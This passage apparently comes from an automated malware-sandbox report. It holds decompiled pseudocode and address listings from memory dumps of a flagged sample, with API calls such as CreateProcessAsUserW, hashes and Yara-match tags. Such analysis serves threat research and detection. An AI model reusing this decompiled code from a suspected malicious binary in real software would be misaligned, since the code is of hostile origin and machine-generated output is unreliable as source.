							__eflags =  *0x737541c0;
							if( *0x737541c0 != 0) {
								goto L5;
							}
							__eflags =  *((intOrPtr*)(0x73754180 + _t58 * 4)) - _t110;
							if( *((intOrPtr*)(0x73754180 + _t58 * 4)) == _t110) {
								L32:
								_t100 = 0;
								__eflags = _t58;
								if(_t58 < 0) {
									L34:
									 *0x737541c0 = 0;
									goto L5;
								} else {
									goto L33;
								}
								do {
									L33:
									_t90 = 0x73754180 + _t100 * 4;
									_t100 = _t100 + 1;
									__eflags = _t100 - _t58;
									 *_t90 = _t110;
									_t110 =  *_t90;
								} while (_t100 <= _t58);
								goto L34;
							}
							_t58 = _t81 - 1;
							__eflags = _t58;
							if(_t58 < 0) {
								L28:
								__eflags = _t81 - 0x10;
								if(_t81 < 0x10) {
									_t81 = _t81 + 1;
									__eflags = _t81;
									 *0x73754178 = _t81;
								}
								_t58 = _t81 - 1;
								goto L32;
							} else {
								goto L25;
							}
							while(1) {
								L25:
								__eflags =  *((intOrPtr*)(0x73754180 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x73754180 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 - 1;
								__eflags = _t58;
								if(_t58 >= 0) {
									continue;
								}
								break;
							}
							__eflags = _t58;
							if(__eflags >= 0) {
								if(__eflags == 0) {
									goto L34;
								}
								goto L32;
							}
							goto L28;
						}
						_t75 =  *((intOrPtr*)(_t108 - 8));
						__eflags = _t75 - _v8;
						if(_t75 < _v8) {
							goto L20;
						}
						__eflags = _t75 - _t108;
						if(_t75 >= _t108) {
							goto L20;
						}
						goto L15;
					}
					L5:
					_t63 = 1;
					goto L60;
				} else {
					goto L3;
				}
			}




































                                                                                                                                        0x737524cf
                                                                                                                                        0x737524d2
                                                                                                                                        0x737524d8
                                                                                                                                        0x737524f6
                                                                                                                                        0x00000000
                                                                                                                                        0x737524f6
                                                                                                                                        0x737524e0
                                                                                                                                        0x737524e9
                                                                                                                                        0x737524ef
                                                                                                                                        0x737524fe
                                                                                                                                        0x73752501
                                                                                                                                        0x73752504
                                                                                                                                        0x7375250e
                                                                                                                                        0x7375250e
                                                                                                                                        0x73752510
                                                                                                                                        0x73752513
                                                                                                                                        0x73752515
                                                                                                                                        0x73752515
                                                                                                                                        0x73752517
                                                                                                                                        0x7375251a
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x7375251c
                                                                                                                                        0x7375251e
                                                                                                                                        0x73752584
                                                                                                                                        0x73752584
                                                                                                                                        0x737526e2
                                                                                                                                        0x00000000
                                                                                                                                        0x737526e2
                                                                                                                                        0x73752520
                                                                                                                                        0x73752520
                                                                                                                                        0x73752524
                                                                                                                                        0x73752526
                                                                                                                                        0x73752526
                                                                                                                                        0x73752526
                                                                                                                                        0x73752526
                                                                                                                                        0x73752529
                                                                                                                                        0x7375252a
                                                                                                                                        0x7375252d
                                                                                                                                        0x7375252d
                                                                                                                                        0x73752531
                                                                                                                                        0x73752535
                                                                                                                                        0x73752543
                                                                                                                                        0x73752543
                                                                                                                                        0x7375254b
                                                                                                                                        0x73752551
                                                                                                                                        0x73752553
                                                                                                                                        0x73752555
                                                                                                                                        0x73752565
                                                                                                                                        0x73752572
                                                                                                                                        0x73752576
                                                                                                                                        0x7375257b
                                                                                                                                        0x7375257d
                                                                                                                                        0x737525fb
                                                                                                                                        0x737525fb
                                                                                                                                        0x7375257f
                                                                                                                                        0x7375257f
                                                                                                                                        0x7375257f
                                                                                                                                        0x737525fd
                                                                                                                                        0x737525ff
                                                                                                                                        0x737526e0
                                                                                                                                        0x737526e0
                                                                                                                                        0x00000000
                                                                                                                                        0x73752605
                                                                                                                                        0x73752605
                                                                                                                                        0x7375260c
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x73752612
                                                                                                                                        0x73752616
                                                                                                                                        0x73752672
                                                                                                                                        0x73752674
                                                                                                                                        0x7375267c
                                                                                                                                        0x7375267e
                                                                                                                                        0x73752680
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x73752682
                                                                                                                                        0x73752688
                                                                                                                                        0x7375268a
                                                                                                                                        0x7375268c
                                                                                                                                        0x737526a1
                                                                                                                                        0x737526a1
                                                                                                                                        0x737526a3
                                                                                                                                        0x737526d2
                                                                                                                                        0x737526d9
                                                                                                                                        0x00000000
                                                                                                                                        0x737526d9
                                                                                                                                        0x737526a7
                                                                                                                                        0x737526a8
                                                                                                                                        0x737526aa
                                                                                                                                        0x737526ac
                                                                                                                                        0x737526ac
                                                                                                                                        0x737526ae
                                                                                                                                        0x737526b0
                                                                                                                                        0x737526b2
                                                                                                                                        0x737526c6
                                                                                                                                        0x737526c6
                                                                                                                                        0x737526c9
                                                                                                                                        0x737526cb
                                                                                                                                        0x737526cb
                                                                                                                                        0x737526cc
                                                                                                                                        0x737526cc
                                                                                                                                        0x00000000
                                                                                                                                        0x737526b4
                                                                                                                                        0x737526b4
                                                                                                                                        0x737526b4
                                                                                                                                        0x737526bd
                                                                                                                                        0x737526be
                                                                                                                                        0x737526c0
                                                                                                                                        0x737526c2
                                                                                                                                        0x737526c2
                                                                                                                                        0x00000000
                                                                                                                                        0x737526b4
                                                                                                                                        0x737526b2
                                                                                                                                        0x7375268e
                                                                                                                                        0x73752695
                                                                                                                                        0x73752695
                                                                                                                                        0x73752697
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x73752699
                                                                                                                                        0x7375269a
                                                                                                                                        0x7375269d
                                                                                                                                        0x7375269f
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x7375269f
                                                                                                                                        0x00000000
                                                                                                                                        0x73752695
                                                                                                                                        0x73752618
                                                                                                                                        0x7375261b
                                                                                                                                        0x73752620
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x73752629
                                                                                                                                        0x7375262b
                                                                                                                                        0x73752631
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x73752637
                                                                                                                                        0x7375263d
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x73752643
                                                                                                                                        0x73752645
                                                                                                                                        0x7375264e
                                                                                                                                        0x73752652
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x73752658
                                                                                                                                        0x7375265b
                                                                                                                                        0x7375265d
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x73752664
                                                                                                                                        0x73752666
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x73752668
                                                                                                                                        0x7375266c
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x7375266c
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x73752557
                                                                                                                                        0x73752557
                                                                                                                                        0x73752557
                                                                                                                                        0x7375255e
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x73752560
                                                                                                                                        0x73752561
                                                                                                                                        0x73752563
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x73752563
                                                                                                                                        0x7375258b
                                                                                                                                        0x7375258d
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x7375259d
                                                                                                                                        0x7375259f
                                                                                                                                        0x737525a1
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x737525a7
                                                                                                                                        0x737525ae
                                                                                                                                        0x737525da
                                                                                                                                        0x737525da
                                                                                                                                        0x737525dc
                                                                                                                                        0x737525de
                                                                                                                                        0x737525f2
                                                                                                                                        0x737525f4
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x737525e0
                                                                                                                                        0x737525e0
                                                                                                                                        0x737525e0
                                                                                                                                        0x737525e9
                                                                                                                                        0x737525ea
                                                                                                                                        0x737525ec
                                                                                                                                        0x737525ee
                                                                                                                                        0x737525ee
                                                                                                                                        0x00000000
                                                                                                                                        0x737525e0
                                                                                                                                        0x737525b0
                                                                                                                                        0x737525b3
                                                                                                                                        0x737525b5
                                                                                                                                        0x737525c7
                                                                                                                                        0x737525c7
                                                                                                                                        0x737525ca
                                                                                                                                        0x737525cc
                                                                                                                                        0x737525cc
                                                                                                                                        0x737525cd
                                                                                                                                        0x737525cd
                                                                                                                                        0x737525d3
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x737525b7
                                                                                                                                        0x737525b7
                                                                                                                                        0x737525b7
                                                                                                                                        0x737525be
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x737525c0
                                                                                                                                        0x737525c0
                                                                                                                                        0x737525c1
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x737525c1
                                                                                                                                        0x737525c3
                                                                                                                                        0x737525c5
                                                                                                                                        0x737525d8
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x737525d8
                                                                                                                                        0x00000000
                                                                                                                                        0x737525c5
                                                                                                                                        0x73752537
                                                                                                                                        0x7375253a
                                                                                                                                        0x7375253d
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x7375253f
                                                                                                                                        0x73752541
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x73752541
                                                                                                                                        0x73752506
                                                                                                                                        0x73752508
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000

                                                                                                                                        APIs
                                                                                                                                        • NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 73752576
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.427793993.0000000073750000.00000040.00000001.sdmp, Offset: 73750000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.427811175.0000000073755000.00000040.00000001.sdmp Download File
                                                                                                                                        • Associated: 00000000.00000002.427822852.0000000073757000.00000040.00000001.sdmp Download File
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MemoryQueryVirtual
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2850889275-0
                                                                                                                                        • Opcode ID: 1985d5cd2e313fbed3e61c7aee99968885a1c13111b863f98b09d3ffdb2ebd77
                                                                                                                                        • Instruction ID: 66e9834c209372891d5a4cb19c3a299b163f9e09570e537afce57d06b9852342
                                                                                                                                        • Opcode Fuzzy Hash: 1985d5cd2e313fbed3e61c7aee99968885a1c13111b863f98b09d3ffdb2ebd77
                                                                                                                                        • Instruction Fuzzy Hash: A161C57160161E9FE70ECF2AC9A071A37BAFB85354B3881A9F817C76D4E731D882C650
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00451481, Relevance: 1.6, Strings: 1, Instructions: 343COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: @
                                                                                                                                        • API String ID: 0-2766056989
                                                                                                                                        • Opcode ID: 3fb857938dd67feabd2887d2846e2b313f19e45705a22e99bffac38c0e30d1e8
                                                                                                                                        • Instruction ID: 7e315773e6730110cda368655add75efa57f9185f142b101ca0de4305b3b8031
                                                                                                                                        • Opcode Fuzzy Hash: 3fb857938dd67feabd2887d2846e2b313f19e45705a22e99bffac38c0e30d1e8
                                                                                                                                        • Instruction Fuzzy Hash: 43D16E30E0024ADBCF18CFA8C4906EEB7B1FF99305F24856ED85297361E7789959CB58
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00442F65, Relevance: 1.6, APIs: 1, Instructions: 57processCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00442FD5
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateProcessUser
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2217836671-0
                                                                                                                                        • Opcode ID: af07084d0142162356b83eb1b928f4e3a2d95a3d8d0831b172b0c1367a7f1edc
                                                                                                                                        • Instruction ID: 8b7128e9916ffb41ed140fd2c4116b8a75cfdef105cd2508fb011ab3405d104b
                                                                                                                                        • Opcode Fuzzy Hash: af07084d0142162356b83eb1b928f4e3a2d95a3d8d0831b172b0c1367a7f1edc
                                                                                                                                        • Instruction Fuzzy Hash: 6C11D232204149BFEF025F99DD00DDA7BB6FF08364B854225FE1952120D776D871AB54
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0045AAB7, Relevance: 1.5, APIs: 1, Instructions: 11COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • RtlNtStatusToDosError.NTDLL(00000000), ref: 0045AACF
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorStatus
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1596131371-0
                                                                                                                                        • Opcode ID: fcd82abb142dd40547366caea3b9fba8f5f1b5e937b1e98b5cad6294f19844c8
                                                                                                                                        • Instruction ID: 550f23ac2d01f39fd2543bebf367db114291ec3ee200b9c8fd83dd8fb4022796
                                                                                                                                        • Opcode Fuzzy Hash: fcd82abb142dd40547366caea3b9fba8f5f1b5e937b1e98b5cad6294f19844c8
                                                                                                                                        • Instruction Fuzzy Hash: 85C01231B043027FDA189F10DD1D92A7B15EB94340F00442DF44A80470EAF49850D616
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0047181A, Relevance: 1.3, Strings: 1, Instructions: 62COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: 7K7W
                                                                                                                                        • API String ID: 0-1434392902
                                                                                                                                        • Opcode ID: 941665f447f5255b3b3d504bfc6b2d7f8f00a2514701c929fd8b2648a4274fc5
                                                                                                                                        • Instruction ID: e300b6882c0b2b5e9d5c3b0fcde79a368239a9f777b216ef15e71f4daf1f851d
                                                                                                                                        • Opcode Fuzzy Hash: 941665f447f5255b3b3d504bfc6b2d7f8f00a2514701c929fd8b2648a4274fc5
                                                                                                                                        • Instruction Fuzzy Hash: 80115B3551C2E25ECB17CB3880D15D67FA39F8721039A47DDC4C19F163C7199896CB91
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0045C53B, Relevance: .7, Instructions: 669COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 7a1a20185242c23e6f847e1b77833af1a15d066d6087a49d0b3e71ee68db0111
                                                                                                                                        • Instruction ID: fbbad15a55162872b52a07062bd14c2aaee078de977495bbc42274649e53ca72
                                                                                                                                        • Opcode Fuzzy Hash: 7a1a20185242c23e6f847e1b77833af1a15d066d6087a49d0b3e71ee68db0111
                                                                                                                                        • Instruction Fuzzy Hash: 85423971A00219DFCF18CF58C5D06ADBBF2EF85306F1481AAD852AB386D7389A49DF54
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00459F48, Relevance: .4, Instructions: 386COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 12a708cca95c067f8c5f248a7bd5d537db9c68be24864f17fb345cea860a6527
                                                                                                                                        • Instruction ID: c2a8df562b36c3e25edfad197eebb154e57533739615ca0792ca6d9b27625fb1
                                                                                                                                        • Opcode Fuzzy Hash: 12a708cca95c067f8c5f248a7bd5d537db9c68be24864f17fb345cea860a6527
                                                                                                                                        • Instruction Fuzzy Hash: EDF15530908609DBCB0CCF99D4A04ADBBB2FF89315F14C29EE89667746C7385A59CF19
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0044A235, Relevance: .3, Instructions: 298COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: memcpy
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3510742995-0
                                                                                                                                        • Opcode ID: 9c8e517d3a80d4f7685ebf3e7aa75aaafbb2756edbf5715a04deddaed301b957
                                                                                                                                        • Instruction ID: f485c47805d6cfac4dfb3f443b0b390dfaa9d5342c97f377bb7d22163ea9c286
                                                                                                                                        • Opcode Fuzzy Hash: 9c8e517d3a80d4f7685ebf3e7aa75aaafbb2756edbf5715a04deddaed301b957
                                                                                                                                        • Instruction Fuzzy Hash: 96C11F35640B008FE325CF29C5809A7B3E1BF99304B54486ED9D787B61EB7AF852CB06
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00432161, Relevance: .1, Instructions: 80COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000003.202248028.0000000000430000.00000040.00000001.sdmp, Offset: 00430000, based on PE: false
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 3efe97dc2a8a4bba8ab3062923cd5757e39d6e6fc7d8f464bc03952a9de49752
                                                                                                                                        • Instruction ID: 8b95a6fe9d5933dbe9dab7d32b51cc75f05409efbe10e231f1a5e9fe0b21bf3f
                                                                                                                                        • Opcode Fuzzy Hash: 3efe97dc2a8a4bba8ab3062923cd5757e39d6e6fc7d8f464bc03952a9de49752
                                                                                                                                        • Instruction Fuzzy Hash: DC21935144E7C05FDB5387B848B56923FB0AF57204B8F58DBC0C28F4B3D558AA1AE722
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 737522A4, Relevance: .1, Instructions: 77COMMONCrypto
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 71%
                                                                                                                                        			E737522A4(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
				intOrPtr _v8;
				char _v12;
				void* __ebp;
				signed int* _t43;
				char _t44;
				void* _t46;
				void* _t49;
				intOrPtr* _t53;
				void* _t54;
				void* _t65;
				long _t66;
				signed int* _t80;
				signed int* _t82;
				void* _t84;
				signed int _t86;
				void* _t89;
				void* _t95;
				void* _t96;
				void* _t99;
				void* _t106;

				_t43 = _t84;
				_t65 = __ebx + 2;
				 *_t43 =  *_t43 ^ __edx ^  *__eax;
				_t89 = _t95;
				_t96 = _t95 - 8;
				_push(_t65);
				_push(_t84);
				_push(_t89);
				asm("cld");
				_t66 = _a8;
				_t44 = _a4;
				if(( *(_t44 + 4) & 0x00000006) != 0) {
					_push(_t89);
					E7375240B(_t66 + 0x10, _t66, 0xffffffff);
					_t46 = 1;
				} else {
					_v12 = _t44;
					_v8 = _a12;
					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
					_t86 =  *(_t66 + 0xc);
					_t80 =  *(_t66 + 8);
					_t49 = E737524C5(_t66);
					_t99 = _t96 + 4;
					if(_t49 == 0) {
						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
						goto L11;
					} else {
						while(_t86 != 0xffffffff) {
							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
							if(_t53 == 0) {
								L8:
								_t80 =  *(_t66 + 8);
								_t86 = _t80[_t86 + _t86 * 2];
								continue;
							} else {
								_t54 =  *_t53();
								_t89 = _t89;
								_t86 = _t86;
								_t66 = _a8;
								_t55 = _t54;
								_t106 = _t54;
								if(_t106 == 0) {
									goto L8;
								} else {
									if(_t106 < 0) {
										_t46 = 0;
									} else {
										_t82 =  *(_t66 + 8);
										E737523B0(_t55, _t66);
										_t89 = _t66 + 0x10;
										E7375240B(_t89, _t66, 0);
										_t99 = _t99 + 0xc;
										E737524A7(_t82[2], 1);
										 *(_t66 + 0xc) =  *_t82;
										_t66 = 0;
										_t86 = 0;
										 *(_t82[2])();
										goto L8;
									}
								}
							}
							goto L13;
						}
						L11:
						_t46 = 1;
					}
				}
				L13:
				return _t46;
			}























                                                                                                                                        0x737522a8
                                                                                                                                        0x737522a9
                                                                                                                                        0x737522aa
                                                                                                                                        0x737522ad
                                                                                                                                        0x737522af
                                                                                                                                        0x737522b2
                                                                                                                                        0x737522b3
                                                                                                                                        0x737522b5
                                                                                                                                        0x737522b6
                                                                                                                                        0x737522b7
                                                                                                                                        0x737522ba
                                                                                                                                        0x737522c4
                                                                                                                                        0x73752375
                                                                                                                                        0x7375237c
                                                                                                                                        0x73752385
                                                                                                                                        0x737522ca
                                                                                                                                        0x737522ca
                                                                                                                                        0x737522d0
                                                                                                                                        0x737522d6
                                                                                                                                        0x737522d9
                                                                                                                                        0x737522dc
                                                                                                                                        0x737522e0
                                                                                                                                        0x737522e5
                                                                                                                                        0x737522ea
                                                                                                                                        0x7375236a
                                                                                                                                        0x00000000
                                                                                                                                        0x737522ec
                                                                                                                                        0x737522ec
                                                                                                                                        0x737522f8
                                                                                                                                        0x737522fa
                                                                                                                                        0x73752355
                                                                                                                                        0x73752355
                                                                                                                                        0x7375235b
                                                                                                                                        0x00000000
                                                                                                                                        0x737522fc
                                                                                                                                        0x7375230b
                                                                                                                                        0x7375230d
                                                                                                                                        0x7375230e
                                                                                                                                        0x7375230f
                                                                                                                                        0x73752312
                                                                                                                                        0x73752312
                                                                                                                                        0x73752314
                                                                                                                                        0x00000000
                                                                                                                                        0x73752316
                                                                                                                                        0x73752316
                                                                                                                                        0x73752360
                                                                                                                                        0x73752318
                                                                                                                                        0x73752318
                                                                                                                                        0x7375231c
                                                                                                                                        0x73752324
                                                                                                                                        0x73752329
                                                                                                                                        0x7375232e
                                                                                                                                        0x7375233a
                                                                                                                                        0x73752342
                                                                                                                                        0x73752349
                                                                                                                                        0x7375234f
                                                                                                                                        0x73752353
                                                                                                                                        0x00000000
                                                                                                                                        0x73752353
                                                                                                                                        0x73752316
                                                                                                                                        0x73752314
                                                                                                                                        0x00000000
                                                                                                                                        0x737522fa
                                                                                                                                        0x7375236e
                                                                                                                                        0x7375236e
                                                                                                                                        0x7375236e
                                                                                                                                        0x737522ea
                                                                                                                                        0x7375238a
                                                                                                                                        0x73752391

                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.427793993.0000000073750000.00000040.00000001.sdmp, Offset: 73750000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.427811175.0000000073755000.00000040.00000001.sdmp Download File
                                                                                                                                        • Associated: 00000000.00000002.427822852.0000000073757000.00000040.00000001.sdmp Download File
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
                                                                                                                                        • Instruction ID: c67d1028c97533ee2c326668ff9f809ea537f951492346a82c35722e2a293e10
                                                                                                                                        • Opcode Fuzzy Hash: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
                                                                                                                                        • Instruction Fuzzy Hash: C92188729002089BD714DF68C884AABBBB9FF49350B4A8159E95ADB245D730F915C7E0
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00466F28, Relevance: .1, Instructions: 77COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 1b247f9ab456798328bbce273d756eab87a009a6d6090662f68ee87ccfb315f2
                                                                                                                                        • Instruction ID: 363f1545c072d45ef078c6afcb00399a7006eaf17ce740ddc747182e887df687
                                                                                                                                        • Opcode Fuzzy Hash: 1b247f9ab456798328bbce273d756eab87a009a6d6090662f68ee87ccfb315f2
                                                                                                                                        • Instruction Fuzzy Hash: 9421F8729042049FCB14EF69D8C08A7BBA5FF44324B06806EED168B246EB34F915CBE1
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00431AE4, Relevance: .1, Instructions: 77COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000003.202248028.0000000000430000.00000040.00000001.sdmp, Offset: 00430000, based on PE: false
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
                                                                                                                                        • Instruction ID: 1919344b1d173f332057334f0cd6bbbcb4aee8442c6e7cfd0cb625625f41e27f
                                                                                                                                        • Opcode Fuzzy Hash: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
                                                                                                                                        • Instruction Fuzzy Hash: 1921B6729002049BCB14DF69C8C09A7F7A5FF49360F0691AAE9558B256EB34F915CBE0
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 004300B7, Relevance: .0, Instructions: 18COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000003.202248028.0000000000430000.00000040.00000001.sdmp, Offset: 00430000, based on PE: false
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 47a3d772c31d688a5bcee17858ad221186959c8e121040ff4758593692ca788a
                                                                                                                                        • Instruction ID: 6f52a777dcb53204e5a4b15006f66678f1f95d3e8210c4e1e9000518ab0c3405
                                                                                                                                        • Opcode Fuzzy Hash: 47a3d772c31d688a5bcee17858ad221186959c8e121040ff4758593692ca788a
                                                                                                                                        • Instruction Fuzzy Hash: 82E0B636400A549FCB35DF05C160A16F7B5EB99770B25865ACC9637B4092B4BD45CBE0
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0043040A, Relevance: .0, Instructions: 15COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000003.202248028.0000000000430000.00000040.00000001.sdmp, Offset: 00430000, based on PE: false
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 259e4b03371160eb19be5a571f6725e2b79151f1f57e516cc1a1973c9c1c81ea
                                                                                                                                        • Instruction ID: 33b8ed0011c4eee07f5d5c5651e3c42830a419ecae1bdaf8e51d2c14295c1a66
                                                                                                                                        • Opcode Fuzzy Hash: 259e4b03371160eb19be5a571f6725e2b79151f1f57e516cc1a1973c9c1c81ea
                                                                                                                                        • Instruction Fuzzy Hash: 3BE046381202008FCB58CF00C0A4D2273B1FB98324B41C699E8010F222C378ED45CB00
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 004593E0, Relevance: 66.9, APIs: 37, Strings: 1, Instructions: 441synchronizationtimethreadCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 004630DD: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,00000000,?,?,?), ref: 00463111
                                                                                                                                          • Part of subcall function 004630DD: GetLastError.KERNEL32(?,00000000,?,?,?), ref: 004631D2
